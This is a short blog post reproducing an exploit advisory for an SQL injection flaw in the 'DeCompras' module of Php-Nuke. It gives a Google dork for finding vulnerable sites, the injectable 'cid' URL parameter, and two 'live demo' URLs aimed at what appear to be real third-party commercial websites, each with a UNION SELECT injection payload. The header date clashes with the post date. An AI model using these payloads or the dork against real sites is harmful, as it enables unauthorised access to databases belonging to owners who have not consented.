Saturday, May 7, 2011

##################################################################
# Title : Php-Nuke Module 'DeCompras' SQL Injection Vulnerability
#
# Author: Scientist
#
# Vendor: [http://phpnuke.org/]
#
# Email : shits@hotmail.com.tr
#
# date : 06.06.2011
#
# Google Dork : inurl:name=DeCompras+cid=
#                
# category  : Web Apps [SQli]
#       
##################################################################

*SQL injection Vulnerability*

# http://[localhost]/modules.php?name=DeCompras&op=categoria&cid=2'
# http://[localhost]/modules.php?name=DeCompras&op=categoria&cid==  [SQLI]

*Live Demo Site:

#http://www.catalogomayorista.com/modules.php?name=DeCompras&op=categoria&cid=2+and+1=0+union+select+1,2,3,4,5,6,7--
#http://www.lobuscasyloencuentras.com/modules.php?name=DeCompras&op=categoria&cid=2+and+1=0+union+select+1,2,3,4,5,6,7--

0 Comments:

Post a Comment